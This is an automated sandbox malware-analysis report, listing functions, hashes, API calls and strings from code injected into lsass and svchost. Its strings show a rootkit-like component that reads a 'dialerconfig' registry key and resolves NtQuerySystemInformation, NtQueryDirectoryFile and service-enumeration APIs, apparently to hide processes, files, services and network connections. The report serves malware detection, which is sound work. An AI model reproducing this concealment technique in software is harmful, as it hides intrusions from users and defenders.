                        • Instruction Fuzzy Hash: AC112B32219B8482EB61CB15E44439977E6F798B9CF584220EE8D07768EF3DC655CB00
                        Function 00000213BDCB7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: f4862c4d9b7376f1182d3b6f5f2b365ac3009e22aec70bc65f16aebbe18ce939
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 4EE08671654B4890DF01CF21E8442D833A5DB68B6CB8891229A5C06315FA38D7EBC300
                        Function 00000213BDCB73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 27a04a9311f7d125a749bde97889680f3ba368b48a2d80739b1b772cb5aa5af3
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: 6FE08C71A54B4880DF02CF21E8802D873A6EB68B6CF889122DA4C06311FA38D7EAC300
                        Function 00000213BDCE1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 02eb1687d551be4925cf3a57e29467bdb8e87c8f6b08593b3f3d5ec8add5e525
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: C9118275605B4882EE04DB66A4082A977A2FB99FCCF185024DE4D87765EF3AD652D300
                        Function 00000213BDCE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: ca62a568da37a1804808f6c472a8f8a8754ce746572dadf88ae12087715b600f
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: CCE0393564160486EB04CB62D80838A36E2EB99B0AF04C02489090B355EF7E8699C750

                        Execution Graph

                        Execution Coverage:0.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:81
                        Total number of Limit Nodes:4
                        execution_graph 14925 158709d1abc 14931 158709d1628 GetProcessHeap 14925->14931 14927 158709d1ad2 Sleep SleepEx 14929 158709d1acb 14927->14929 14929->14927 14930 158709d1598 StrCmpIW StrCmpW 14929->14930 14976 158709d18b4 14929->14976 14930->14929 14932 158709d1648 __free_lconv_mon 14931->14932 14993 158709d1268 GetProcessHeap 14932->14993 14934 158709d1650 14935 158709d1268 2 API calls 14934->14935 14936 158709d1661 14935->14936 14937 158709d1268 2 API calls 14936->14937 14938 158709d166a 14937->14938 14939 158709d1268 2 API calls 14938->14939 14940 158709d1673 14939->14940 14941 158709d168e RegOpenKeyExW 14940->14941 14942 158709d18a6 14941->14942 14943 158709d16c0 RegOpenKeyExW 14941->14943 14942->14929 14944 158709d16ff RegOpenKeyExW 14943->14944 14945 158709d16e9 14943->14945 14947 158709d1723 14944->14947 14948 158709d173a RegOpenKeyExW 14944->14948 14997 158709d12bc RegQueryInfoKeyW 14945->14997 15008 158709d104c RegQueryInfoKeyW 14947->15008 14951 158709d1775 RegOpenKeyExW 14948->14951 14952 158709d175e 14948->14952 14949 158709d16f5 RegCloseKey 14949->14944 14955 158709d17b0 RegOpenKeyExW 14951->14955 14956 158709d1799 14951->14956 14954 158709d12bc 11 API calls 14952->14954 14959 158709d176b RegCloseKey 14954->14959 14957 158709d17d4 14955->14957 14958 158709d17eb RegOpenKeyExW 14955->14958 14960 158709d12bc 11 API calls 14956->14960 14961 158709d12bc 11 API calls 14957->14961 14962 158709d1826 RegOpenKeyExW 14958->14962 14963 158709d180f 14958->14963 14959->14951 14964 158709d17a6 RegCloseKey 14960->14964 14965 158709d17e1 RegCloseKey 14961->14965 14967 158709d1861 RegOpenKeyExW 14962->14967 14968 158709d184a 14962->14968 14966 158709d104c 4 API calls 14963->14966 14964->14955 14965->14958 14969 158709d181c RegCloseKey 14966->14969 14971 158709d1885 14967->14971 14972 158709d189c RegCloseKey 14967->14972 14970 158709d104c 4 API calls 14968->14970 14969->14962 14973 158709d1857 RegCloseKey 14970->14973 14974 158709d104c 4 API calls 14971->14974 14972->14942 14973->14967 14975 158709d1892 RegCloseKey 14974->14975 14975->14972 15021 158709d14a4 14976->15021 15014 158709e6168 14993->15014 14996 158709d12ae __free_lconv_mon 14996->14934 14998 158709d1327 GetProcessHeap 14997->14998 14999 158709d148a __free_lconv_mon 14997->14999 15002 158709d133e __free_lconv_mon 14998->15002 14999->14949 15000 158709d1476 GetProcessHeap 15000->14999 15001 158709d1352 RegEnumValueW 15001->15002 15002->15000 15002->15001 15004 158709d13d3 GetProcessHeap 15002->15004 15005 158709d141e lstrlenW GetProcessHeap 15002->15005 15006 158709d13f3 GetProcessHeap 15002->15006 15007 158709d1443 StrCpyW 15002->15007 15016 158709d152c 15002->15016 15004->15002 15005->15002 15006->15002 15007->15002 15009 158709d11b5 RegCloseKey 15008->15009 15010 158709d10bf __free_lconv_mon 15008->15010 15009->14948 15010->15009 15011 158709d10cf RegEnumValueW 15010->15011 15012 158709d114e GetProcessHeap 15010->15012 15013 158709d116e GetProcessHeap 15010->15013 15011->15010 15012->15010 15013->15010 15015 158709d1283 GetProcessHeap 15014->15015 15015->14996 15017 158709d157c 15016->15017 15020 158709d1546 15016->15020 15017->15002 15018 158709d1565 StrCmpW 15018->15020 15019 158709d155d StrCmpIW 15019->15020 15020->15017 15020->15018 15020->15019 15022 158709d14e1 GetProcessHeap 15021->15022 15023 158709d14c1 GetProcessHeap 15021->15023 15027 158709e6180 15022->15027 15025 158709d14da __free_lconv_mon 15023->15025 15025->15022 15025->15023 15028 158709d14f6 GetProcessHeap HeapFree 15027->15028 15029 158709a273c 15030 158709a276a 15029->15030 15031 158709a2858 LoadLibraryA 15030->15031 15032 158709a28d4 15030->15032 15031->15030

                        Executed Functions

                        Function 00000158709D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: 406b0553ad116c0cf0cb50d7a38d1fd5da460869398bb6113de0fb484408bd0d
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 99418237218F84D6E760CF21E84439E77A1F389B99F148129DB891B758DF38C586CB00
                        Function 00000158709D328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: d10138deb8bbbe3c9e36edbeaa6ef6b6b2d091da5ebc89b531e029dc850f4207
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 9211C43E658E08C2F7609B21FE053D97294B7CC387FB08124990A6D6E6EF78C0468E00
                        Function 00000158709D1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00000158709D1628: GetProcessHeap.KERNEL32 ref: 00000158709D1633
                          • Part of subcall function 00000158709D1628: HeapAlloc.KERNEL32 ref: 00000158709D1642
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16B2
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D16DF
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D16F9
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1719
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1734
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1754
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D176F
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D178F
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17AA
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17CA
                        • Sleep.KERNEL32 ref: 00000158709D1AD7
                        • SleepEx.KERNELBASE ref: 00000158709D1ADD
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D17E5
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1805
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1820
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1840
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D185B
                          • Part of subcall function 00000158709D1628: RegOpenKeyExW.ADVAPI32 ref: 00000158709D187B
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D1896
                          • Part of subcall function 00000158709D1628: RegCloseKey.ADVAPI32 ref: 00000158709D18A0
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: dd6c86af37df3cdfce808d9367ca0a589ea4c12304fe849a19c5307a2c397293
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: C931B47B244D49E1EB509B36DE513F93394A7CCBD2F2454229E09AF79BEE18C4538A10
                        Function 00000158709D3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 73 158709d3844-158709d384f 74 158709d3851-158709d3864 StrCmpNIW 73->74 75 158709d3869-158709d3870 73->75 74->75 76 158709d3866 74->76 76->75
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: dialer
                        • API String ID: 0-3528709123
                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                        • Instruction ID: 780bff3d9f94a45a4787809db9a9868108e6e80b955a58f819050ff7eb005af9
                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                        • Instruction Fuzzy Hash: 8ED05E79351A09C6FB149FA68CC47A03350AB8C7D6FA89020990019160DF188D9EAE10
                        Function 00000158709A273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 917a96bc1d6c895ecea56c2d7ec6bba4e4c507b6cb4fc8ea2b9ce0172117c01a
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: 9A61E3BAB09A90C7DB548F19D9007EA7392F7D8B95F248121DE593B784DE38D853EB00

                        Non-executed Functions

                        Function 00000158709D2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 385 158709d2b2c-158709d2ba5 call 158709f2ce0 388 158709d2ee0-158709d2f03 385->388 389 158709d2bab-158709d2bb1 385->389 389->388 390 158709d2bb7-158709d2bba 389->390 390->388 391 158709d2bc0-158709d2bc3 390->391 391->388 392 158709d2bc9-158709d2bd9 GetModuleHandleA 391->392 393 158709d2bed 392->393 394 158709d2bdb-158709d2beb GetProcAddress 392->394 395 158709d2bf0-158709d2c0e 393->395 394->395 395->388 397 158709d2c14-158709d2c33 StrCmpNIW 395->397 397->388 398 158709d2c39-158709d2c3d 397->398 398->388 399 158709d2c43-158709d2c4d 398->399 399->388 400 158709d2c53-158709d2c5a 399->400 400->388 401 158709d2c60-158709d2c73 400->401 402 158709d2c75-158709d2c81 401->402 403 158709d2c83 401->403 404 158709d2c86-158709d2c8a 402->404 403->404 405 158709d2c8c-158709d2c98 404->405 406 158709d2c9a 404->406 407 158709d2c9d-158709d2ca7 405->407 406->407 408 158709d2d9d-158709d2da1 407->408 409 158709d2cad-158709d2cb0 407->409 410 158709d2da7-158709d2daa 408->410 411 158709d2ed2-158709d2eda 408->411 412 158709d2cc2-158709d2ccc 409->412 413 158709d2cb2-158709d2cbf call 158709d199c 409->413 414 158709d2dac-158709d2db8 call 158709d199c 410->414 415 158709d2dbb-158709d2dc5 410->415 411->388 411->401 417 158709d2d00-158709d2d0a 412->417 418 158709d2cce-158709d2cdb 412->418 413->412 414->415 420 158709d2df5-158709d2df8 415->420 421 158709d2dc7-158709d2dd4 415->421 424 158709d2d0c-158709d2d19 417->424 425 158709d2d3a-158709d2d3d 417->425 418->417 423 158709d2cdd-158709d2cea 418->423 430 158709d2e05-158709d2e12 lstrlenW 420->430 431 158709d2dfa-158709d2e03 call 158709d1bbc 420->431 421->420 429 158709d2dd6-158709d2de3 421->429 432 158709d2ced-158709d2cf3 423->432 424->425 433 158709d2d1b-158709d2d28 424->433 427 158709d2d3f-158709d2d49 call 158709d1bbc 425->427 428 158709d2d4b-158709d2d58 lstrlenW 425->428 427->428 440 158709d2d93-158709d2d98 427->440 436 158709d2d7b-158709d2d8d call 158709d3844 428->436 437 158709d2d5a-158709d2d64 428->437 438 158709d2de6-158709d2dec 429->438 442 158709d2e35-158709d2e3f call 158709d3844 430->442 443 158709d2e14-158709d2e1e 430->443 431->430 449 158709d2e4a-158709d2e55 431->449 432->440 441 158709d2cf9-158709d2cfe 432->441 434 158709d2d2b-158709d2d31 433->434 434->440 444 158709d2d33-158709d2d38 434->444 436->440 452 158709d2e42-158709d2e44 436->452 437->436 447 158709d2d66-158709d2d79 call 158709d152c 437->447 448 158709d2dee-158709d2df3 438->448 438->449 440->452 441->417 441->432 442->452 443->442 453 158709d2e20-158709d2e33 call 158709d152c 443->453 444->425 444->434 447->436 447->440 448->420 448->438 456 158709d2e57-158709d2e5b 449->456 457 158709d2ecc-158709d2ed0 449->457 452->411 452->449 453->442 453->449 461 158709d2e63-158709d2e7d call 158709d85c0 456->461 462 158709d2e5d-158709d2e61 456->462 457->411 464 158709d2e80-158709d2e83 461->464 462->461 462->464 467 158709d2e85-158709d2ea3 call 158709d85c0 464->467 468 158709d2ea6-158709d2ea9 464->468 467->468 468->457 469 158709d2eab-158709d2ec9 call 158709d85c0 468->469 469->457
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: e19b0cfe6a8045a754af9c3da777dccb95321baacbab1f044a34d1dd9148c669
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 4EB1B03A218E58C2EB648F25DC407E973A5FBD8B96F245016EE496B796DF34CC42CB40
                        Function 00000158709D7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: e7c148938d73b118393facd0308456c1e40248a19777e3d89d8291f9a2c8a452
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: 9D313A76205E84CAEB609F60E8403EE7361F788745F54402ADA4D6BBA5EF38C949CB10
                        Function 00000158709DD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: 059a4172f76ea96128a6440cafd08da1c107212dcb3790aa4d309b172f3a75cd
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: C5315B3A214F84C6DB60CB25E8403DE73A0F7C9799F640126EA9D5BBA5EF38C556CB00
                        Function 00000158709D1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 0f6089fd75106e825002abacbaf1900165387074937e0fada7e43ed3f6eff390
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: 3371183B314E14D6EB109F72EC4079933A5F7C8B8AF101121DA4E6BB29DE34C956CB40
                        Function 00000158709D12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: eb3ce238f31fcb04bd06a980f3a210d1e24ed5b83b152061e04dc28651e22d57
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: E5513A3B208B84D6EB55CF62E84839A77A1F7C9BDAF144124DA491B729DF38C456CB00
                        Function 00000158709D1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: fe178ff9f80e494172ea236cf487610b27fb66f29a12b80d336874847e16e756
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: B131AE7E545E4AE0EA04EBA9EC517E43320F7DC346FA9401394493E277AF38865BCB50
                        Function 00000158709A6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 227 158709a6910-158709a6916 228 158709a6951-158709a695b 227->228 229 158709a6918-158709a691b 227->229 232 158709a6a78-158709a6a8d 228->232 230 158709a6945-158709a6984 call 158709a6fc0 229->230 231 158709a691d-158709a6920 229->231 247 158709a6a52 230->247 248 158709a698a-158709a699f call 158709a6e54 230->248 233 158709a6922-158709a6925 231->233 234 158709a6938 __scrt_dllmain_crt_thread_attach 231->234 235 158709a6a8f 232->235 236 158709a6a9c-158709a6ab6 call 158709a6e54 232->236 238 158709a6931-158709a6936 call 158709a6f04 233->238 239 158709a6927-158709a6930 233->239 242 158709a693d-158709a6944 234->242 240 158709a6a91-158709a6a9b 235->240 250 158709a6ab8-158709a6aed call 158709a6f7c call 158709a6e1c call 158709a7318 call 158709a7130 call 158709a7154 call 158709a6fac 236->250 251 158709a6aef-158709a6b20 call 158709a7190 236->251 238->242 252 158709a6a54-158709a6a69 247->252 259 158709a69a5-158709a69b6 call 158709a6ec4 248->259 260 158709a6a6a-158709a6a77 call 158709a7190 248->260 250->240 261 158709a6b22-158709a6b28 251->261 262 158709a6b31-158709a6b37 251->262 279 158709a6a07-158709a6a11 call 158709a7130 259->279 280 158709a69b8-158709a69dc call 158709a72dc call 158709a6e0c call 158709a6e38 call 158709aac0c 259->280 260->232 261->262 266 158709a6b2a-158709a6b2c 261->266 267 158709a6b39-158709a6b43 262->267 268 158709a6b7e-158709a6b94 call 158709a268c 262->268 273 158709a6c1f-158709a6c2c 266->273 274 158709a6b45-158709a6b4d 267->274 275 158709a6b4f-158709a6b5d call 158709b5780 267->275 288 158709a6b96-158709a6b98 268->288 289 158709a6bcc-158709a6bce 268->289 282 158709a6b63-158709a6b78 call 158709a6910 274->282 275->282 292 158709a6c15-158709a6c1d 275->292 279->247 300 158709a6a13-158709a6a1f call 158709a7180 279->300 280->279 330 158709a69de-158709a69e5 __scrt_dllmain_after_initialize_c 280->330 282->268 282->292 288->289 297 158709a6b9a-158709a6bbc call 158709a268c call 158709a6a78 288->297 290 158709a6bd0-158709a6bd3 289->290 291 158709a6bd5-158709a6bea call 158709a6910 289->291 290->291 290->292 291->292 309 158709a6bec-158709a6bf6 291->309 292->273 297->289 324 158709a6bbe-158709a6bc6 call 158709b5780 297->324 317 158709a6a21-158709a6a2b call 158709a7098 300->317 318 158709a6a45-158709a6a50 300->318 314 158709a6c01-158709a6c11 call 158709b5780 309->314 315 158709a6bf8-158709a6bff 309->315 314->292 315->292 317->318 329 158709a6a2d-158709a6a3b 317->329 318->252 324->289 329->318 330->279 331 158709a69e7-158709a6a04 call 158709aabc8 330->331 331->279
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2bc89b2b44f4cc9601cd367f7fcf5040b1f2b50bcf0555486a2ee6e897309275
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 0481AFBD708E41C6FA909B659C413D972A0A7CD782F7480259A49BF796DF38C847EF00
                        Function 00000158709DCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 00000158709DCE37
                        • FlsGetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE4C
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE6D
